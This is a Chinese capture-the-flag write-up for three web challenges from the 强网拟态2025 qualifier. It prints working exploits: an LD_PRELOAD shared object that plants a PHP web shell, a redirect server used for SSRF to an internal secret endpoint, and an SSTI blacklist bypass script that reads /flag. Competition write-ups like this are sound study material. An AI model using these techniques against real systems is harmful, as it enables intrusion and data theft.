强网拟态2025初赛 Web Writeup

smallcode

<?php
    highlight_file(__FILE__);
    if(isset($_POST['context'])){
        $context = $_POST['context'];
        file_put_contents("1.txt",base64_decode($context));
    }

    if(isset($_POST['env'])){
        $env = $_POST['env'];
        putenv($env);
    }
    system("nohup wget --content-disposition -N hhhh &");

写so,编译


#include <stdlib.h>
#include <unistd.h>

__attribute__ ((__constructor__)) void init(void){
    // 防止递归加载
    unsetenv("LD_PRELOAD");
    
    system("printf \"<?php if(isset(\\$_POST['cmd'])){system(\\$_POST['cmd']);} ?>\" > /var/www/html/shell.php");
}

把so文件内容base64编码后上传

image-20251027110600364

加载

env=LD_PRELOAD=/var/www/html/1.txt

在/var/www/html写shell.php,但是读flag需要提权

find / -perm -u=s -type f 2>/dev/null
nl /flag

image-20251027110632982

safesecret

from flask import Flask, request, jsonify, Response, abort, render_template_string, session
import requests, re
from urllib.parse import urljoin, urlparse

app = Flask(__name__)

MAX_TOTAL_STEPS = 30
ERROR_COUNT = 6

META_REFRESH_RE = re.compile(
    r'<meta\s+http-equiv=["\']refresh["\']\s+content=["\']\s*\d+\s*;\s*url=([^"\']+)["\']',
    re.IGNORECASE
)


def read(f): return open(f).read()


SECRET = read("/secret").strip()
app.secret_key = "a_test_secret"


def sset(key, value):
    session[key] = value
    return ""


def sget(key, default=None):
    return session.get(key, default)


app.jinja_env.globals.update(sget=sget)
app.jinja_env.globals.update(sset=sset)


@app.route("/_internal/secret")
def internal_flag():
    if request.remote_addr not in ("127.0.0.1", "::1"):
        abort(403)
    body = f'OK Secret: {SECRET}'
    return Response(body, mimetype="application/json")


@app.route("/")
def index():
    return "welcome"


def _next_by_refresh_header(r, current_url):
    refresh = r.headers.get("Refresh")
    if not refresh:
        return None
    try:
        part = refresh.split(";", 1)[1]
        k, v = part.split("=", 1)
        if k.strip().lower() == "url":
            return urljoin(current_url, v.strip())
    except Exception:
        return None


def _next_by_meta_refresh(r, current_url):
    m = META_REFRESH_RE.search(r.text[:5000])
    if m:
        return urljoin(current_url, m.group(1).strip())
    return None


def _next_by_authlike_header(r, current_url):
    if r.status_code in (401, 407, 429):
        nxt = r.headers.get("X-Next")
        if nxt:
            return urljoin(current_url, nxt)
    return None


def my_fetch(url):
    session = requests.Session()
    current_url = url
    count_redirect = 0
    history = []
    last_resp = None

    while count_redirect < MAX_TOTAL_STEPS:
        print(count_redirect)
        try:
            r = session.get(current_url, allow_redirects=False, timeout=5)
            print(r.text)
        except Exception as e:
            return history, None, f"Upstream request failed: {e}"

        last_resp = r
        history.append({
            "url": current_url,
            "status": r.status_code,
            "headers": dict(r.headers),
            "body_preview": r.text[:800]
        })

        nxt = _next_by_refresh_header(r, current_url)
        if nxt:
            current_url = nxt
            count_redirect += 1
            continue

        nxt = _next_by_meta_refresh(r, current_url)
        if nxt:
            current_url = nxt
            count_redirect += 1
            continue

        nxt = _next_by_authlike_header(r, current_url)
        if nxt:
            current_url = nxt
            count_redirect += 1
            continue

        break

    return history, last_resp, None


@app.route("/fetch")
def fetch():
    target = request.args.get("url")
    if not target:
        return jsonify({"error": "no url"}), 400

    history, last_resp, err = my_fetch(target)
    if err:
        return jsonify({"error": err}), 502
    if not last_resp:
        return jsonify({"error": "no response"}), 502

    walked_steps = len(history) - 1
    try:
        if "application/json" in (last_resp.headers.get("Content-Type") or "").lower():
            _ = last_resp.json()
        else:
            if "MUST_HAVE_FIELD" not in last_resp.text:
                raise ValueError("JSON schema mismatch")
        return jsonify({"ok": True, "len": len(last_resp.text)})

    except Exception as parse_err:
        if walked_steps >= ERROR_COUNT:
            raw = []
            raw.append(last_resp.text[:5000])
            return Response("\n".join(raw), mimetype="text/plain", status=500)
        else:
            return jsonify({"error": "Invalid JSON"}), 500


@app.route("/login")
def login():
    username = request.args.get("username")
    secret = request.args.get("secret", "")
    blacklist = ["config", "_", "read", "{{"]
    if secret != SECRET:
        return ("forbidden", 403)

    if len(username) > 47:
        return ("username too long", 400)

    if any([n in username.lower() for n in blacklist]):
        return ("forbidden", 403)

    sset('username', username)

    rendered = render_template_string("Welcome: " + username)
    return rendered


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

需要进行七次重定向

ai写个Exp,放vps上

from http.server import HTTPServer, BaseHTTPRequestHandler

class RefreshRedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        print(f"Request: {self.path}")

        if self.path == '/start':
            self.send_response(200)
            self.send_header('Refresh', '0; url=/step1')
            self.end_headers()
            self.wfile.write(b'Redirecting...')
        elif self.path == '/step1':
            self.send_response(200)
            self.send_header('Refresh', '0; url=/step2')
            self.end_headers()
            self.wfile.write(b'Redirecting...')
        elif self.path == '/step2':
            self.send_response(200)
            self.send_header('Refresh', '0; url=/step3')
            self.end_headers()
            self.wfile.write(b'Redirecting...')
        elif self.path == '/step3':
            self.send_response(200)
            self.send_header('Refresh', '0; url=/step4')
            self.end_headers()
            self.wfile.write(b'Redirecting...')
        elif self.path == '/step4':
            self.send_response(200)
            self.send_header('Refresh', '0; url=/step5')
            self.end_headers()
            self.wfile.write(b'Redirecting...')
        elif self.path == '/step5':
            self.send_response(200)
            self.send_header('Refresh', '0; url=/step6')
            self.end_headers()
            self.wfile.write(b'Redirecting...')
        elif self.path == '/step6':
            self.send_response(200)
            self.send_header('Refresh', '0; url=http://127.0.0.1:5000/_internal/secret')
            self.end_headers()
            self.wfile.write(b'Final redirect...')
        else:
            self.send_response(404)
            self.end_headers()
            self.wfile.write(b'Not Found')

    def log_message(self, format, *args):
        print(f"LOG: {format % args}")

if __name__ == '__main__':
    server = HTTPServer(('0.0.0.0', 8000), RefreshRedirectHandler)
    print('Starting Refresh header redirect server on port 8000...')
    server.serve_forever()

访问/fetch?url=http://vps:port/start即可

image-20251027110736747

拿到Secret: 1140457d-a0b5-4e6d-a423-5a676e61992a

login?secret=1140457d-a0b5-4e6d-a423-5a676e61992a&username={%print(1)%}

下面就需要绕ssti黑名单和长度限制

这里过滤了config,那么就不能用config.update,如果要打继承链的话需要一个全局字典

可以看到

image-20251027110816184

我们可以通过sset设置session中的键值对,再用sget获取session的值

构造出来

sget['__globals__']['read']('/flag')
#等价于read('/flag')

实际上就是通过globals获取到read函数,再通过read函数去读取/flag

import requests
import re

url = "http://web-aff0e10d2f.challenge.xctf.org.cn/"
secret_key = "1140457d-a0b5-4e6d-a423-5a676e61992a"


def exp():
    login_url = url + "login"
    s = requests.session()

    payloads = [
        {"username": "{%print sset('g',request.args.g)%}", "g": "__globals__"},
        {"username": "{%print sset('r',request.args.r)%}", "r": "read"},
        {"username": "{%print sset('f',request.args.f)%}", "f": "/flag"}
    ]

    for payload in payloads:
        s.get(login_url, params={"secret": secret_key, **payload})

    payload4 = {
        "secret": secret_key,
        "username": "{%print sget[sget('g')][sget('r')](sget('f'))%}",
    }
    res = s.get(login_url, params=payload4)

    result = res.text
    print(result)

    if "flag{" in result:
        flag_match = re.search(r"flag\{[^}]+\}", result)
        if flag_match:
            print(f"\n找到FLAG: {flag_match.group(0)}")


if __name__ == "__main__":
    exp()

image-20251027110903309

ezcloud

扫目录发现有actuator接口泄露

发现spring cloud getway,最近刚爆出SpeL漏洞

然后参考https://rce.moe/2025/09/29/CVE-2025-41243/文章里面的文件读取即可读取flag

image-20251027110937674

image-20251027110953660

每次设置完路由post访问refresh进行更新

image-20251027111019968

image-20251027111031293

将路由设置到根目录后然后访问/webjars/flag

image-20251027111104591